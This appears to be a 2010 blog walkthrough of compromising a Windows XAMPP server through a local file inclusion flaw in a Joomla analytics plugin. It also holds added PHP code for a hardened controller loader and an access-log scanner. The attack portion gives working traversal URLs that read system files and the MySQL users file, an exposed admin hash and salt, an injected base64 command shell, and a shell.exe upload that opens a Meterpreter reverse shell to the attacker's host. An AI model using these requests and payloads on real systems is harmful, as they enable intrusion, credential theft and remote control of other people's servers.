2010/10/21
New method and style: hacking a Windows server using LFI and a new type of backdoor (.exe)
Local File Inclusion (LFI) flaws are among the most common vulnerabilities found in web applications. Because they are thought to be relatively benign, most organizations dismiss the large security risk they potentially create. In this paper I'll present an attack against a site where the only known vulnerability is a web application that is vulnerable to Local File Inclusion.
The host is a Windows system running XAMPP to supply Apache, MySQL and PHP. The site runs the Joomla! web application and has a single vulnerable plugin installed: com_ganalytics, the Google Analytics plugin that Joomla site operators use to track site usage.
The vulnerable piece of code that makes LFI possible is found in the ganalytics.php file. It’s the following:
if ($controller = JRequest::getVar('controller')) {
    // $controller comes straight from the request and is spliced into a filesystem path
    require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}
The 'controller' parameter accepts whatever path is passed to it without any verification. This small mistake allows an attacker to traverse the entire file system.
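As an added example (not from the post or the com_ganalytics plugin), here is the vulnerable dispatch beside a hardened version that only loads controllers from a fixed allow-list and verifies the resolved path; the function names and the $allowed list are illustrative assumptions.

```php
<?php
// Added example (not from the post or the com_ganalytics plugin): the
// vulnerable dispatch beside a hardened one. Function names and the
// $allowed list are illustrative assumptions.
define('DS', DIRECTORY_SEPARATOR);
define('JPATH_COMPONENT', __DIR__);

// Vulnerable: the client-supplied name is spliced straight into a path.
// On PHP before 5.3.4 a NUL byte (%00) also truncated the path, so the
// trailing ".php" was dropped and any readable file could be included.
function load_controller_vulnerable($controller) {
    require_once(JPATH_COMPONENT . DS . 'controllers' . DS . $controller . '.php');
}

// Hardened, step 1: the name must be identifier-like and on an allow-list.
// This alone rejects "..", "/", "\", NUL bytes and unknown controllers.
// (Joomla's own JRequest::getWord()/getCmd() apply a similar character
// filter, but an explicit allow-list is still the stronger check.)
function is_valid_controller_name($controller, array $allowed) {
    return is_string($controller)
        && preg_match('/^[a-z0-9_]{1,32}\z/i', $controller) === 1
        && in_array($controller, $allowed, true);
}

// Hardened, step 2: even for an allowed name, confirm the resolved file
// really lives under the controllers directory before including it.
function load_controller_safe($controller, array $allowed) {
    if (!is_valid_controller_name($controller, $allowed)) return false;
    $base = realpath(JPATH_COMPONENT . DS . 'controllers');
    $path = realpath(JPATH_COMPONENT . DS . 'controllers' . DS . $controller . '.php');
    if ($base === false || $path === false || strpos($path, $base . DS) !== 0) return false;
    require_once($path);
    return true;
}

// Constructed inputs: one legitimate name plus the two traversal values
// used in the post (with %00 decoded to a real NUL byte, as PHP sees it).
$allowed = array('default', 'settings');
$samples = array(
    'settings',
    "..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\0",
    "..\\..\\..\\..\\..\\..\\..\\..\\..\\xamp\\mysql\\data\\joomla\\jos_users.MYD\0",
);
foreach ($samples as $s) {
    $ok = is_valid_controller_name($s, $allowed) ? 'accepted' : 'rejected';
    echo str_replace("\0", '%00', $s) . ' => ' . $ok . PHP_EOL;
}
```

Only the first sample is accepted; both traversal strings fail the name check before any filesystem access happens.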
I was able to use this code in the following manner to read files on the local machine.
http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\boot.ini%00
This returned the following in my browser…
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
Nice…
After a bit of research into the Joomla database layout, I learned that the jos_users table is the one that contains the user information. Everything from the password hashes and salts to user e-mail addresses is kept in that table.
Using the same directory traversal as before, we'll attempt to read the MySQL data file containing the user credentials with the following request:
http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00
with the following result…
þ>��� Administrator admin administrator@localhost-db.comA115def1b208327f20d85b65aa7dc2440:UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I Super Administrator 9²þG ��ìnH H ���m�admin_language=language= editor= helpsite= timezone=0 ��
The important part of the output above is the value after the e-mail address: the Joomla site administrator's password hash and salt, separated by a colon.
hash=115def1b208327f20d85b65aa7dc2440
salt=UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I
The following Joomla forum thread explains how the Joomla password hash is calculated: http://forum.joomla.org/viewtopic.php?f=432&t=207689
It is the MD5 digest of the cleartext password followed by the salt.
With this knowledge the easiest way into the administrative interface is probably to brute force the administrator password.
We navigate to the administrator account settings page and look for a field in which to inject a small piece of PHP code that would allow us to execute commands on the local system.
We use the Tamper Data Firefox plugin to inject the PHP base64-decode shell into the 'language' field.
At this point we have the ability to run commands on the system. The process involves the following steps:
* base64-encoding our command
* injecting the base64-encoded text into the 'cmd' parameter
* running the command by calling the base64-decoder shell that we injected into the database
So let's give it a shot. We'll base64-encode the "dir" command:
http://localhost/joomla/index.php?option=com_ganalytics&cmd=ZGlyCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD
with the following result:
(sorry hidden for Privacy)
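As an added example (not part of the original post), a small PHP scanner that flags the request patterns this chain leaves behind in an Apache access log: traversal sequences, NUL bytes, data-file names and base64-looking cmd= values. The log lines are constructed for illustration and the function names are assumptions.

```php
<?php
// Added example (not from the post): scan Apache access-log lines for the
// request patterns this attack leaves behind. The log lines are constructed
// for illustration; the query strings are the ones shown in the post.

function lfi_indicators($request_uri) {
    // Decode once so %5C becomes "\" and %00 becomes a real NUL byte.
    $u = rawurldecode($request_uri);
    $hits = array();
    if (preg_match('#\.\.[\\\\/]#', $u))                      $hits[] = 'directory traversal';
    if (strpos($u, "\0") !== false)                           $hits[] = 'NUL byte (path truncation)';
    if (preg_match('/[?&]controller=[^&]*[\\\\\/]/i', $u))    $hits[] = 'path separator in controller=';
    if (preg_match('/\.(myd|myi|ini)(\x00|&|$)/i', $u))       $hits[] = 'data/config file name';
    if (preg_match('#[?&]cmd=[A-Za-z0-9+/]+=*(&|$)#', $u))    $hits[] = 'base64-looking cmd= value';
    return $hits;
}

function scan_log(array $lines) {
    $findings = array();
    foreach ($lines as $line) {
        // Combined log format: IP ident user [time] "METHOD URI HTTP/x" status size ...
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $hits = lfi_indicators($m[2]);
        if ($hits) {
            $findings[] = array('ip' => $m[1], 'uri' => $m[2], 'hits' => $hits);
        }
    }
    return $findings;
}

// Constructed sample log: one benign request, then the boot.ini read and the
// base64 "cmd" request from the post, as a browser would URL-encode them.
$log = array(
    '10.0.0.5 - - [21/Oct/2010:10:01:02 +0000] "GET /joomla/index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [21/Oct/2010:10:02:15 +0000] "GET /joomla/index.php?option=com_ganalytics&controller=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini%00 HTTP/1.1" 200 310',
    '10.0.0.9 - - [21/Oct/2010:10:03:40 +0000] "GET /joomla/index.php?option=com_ganalytics&cmd=ZGlyCg==&controller=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cxamp%5Cmysql%5Cdata%5Cjoomla%5Cjos_users.MYD%00 HTTP/1.1" 200 2048',
);
foreach (scan_log($log) as $f) {
    echo $f['ip'] . ' ' . $f['uri'] . PHP_EOL . '   -> ' . implode(', ', $f['hits']) . PHP_EOL;
}
```

The benign com_content request produces no finding; the two com_ganalytics requests are reported with every indicator they trigger.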
Nice. The next step is to get something a bit more ‘potent’ on the system so that we get shell access.
We're going to make use of PHP's $_FILES variable to create a file uploader that we can use to put our payload on the local file system.
root@bt:~/ctp/traversal/joomla# cat upload.php
<?php
// Base64-encode the command that writes the uploader to d.php
// (the uploader code between the quotes is not shown in the post)
$upload="echo \"\" > d.php";
$output=base64_encode($upload);
echo $output;
?>
Now we try to pop the shell:
root@bt:~/ctp/traversal/joomla# echo shell.exe | base64
c2hlbGwuZXhlCg==
root@bt:~/ctp/traversal/joomla#
http://localhost/joomla/index.php?option=com_ganalytics&cmd=c2hlbGwuZXhlCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00
Meanwhile on the attacking machine…
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.77.236:443
[*] Starting the payload handler…
[*] Sending stage (748032 bytes) to 172.16.77.246
[*] Meterpreter session 2 opened (172.16.77.236:443 -> 172.16.77.246:1682)
meterpreter > getuid
Server username: JOOMLA\Administrator
meterpreter > shell
Process 2640 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\xamp\htdocs\joomla>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : example.com
IP Address. . . . . . . . . . . . : 172.16.77.246
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.77.8
C:\xamp\htdocs>
Game Over..!!!
At this point the attacker can use this machine as a pivot to attack other machines within the network, install trojans, place rogue code on the web server, and so on. The only limit is their creativity. So the next time you run a vulnerability scanner against your web application farm, don't be so quick to dismiss the potential damage of the RFI/LFI results.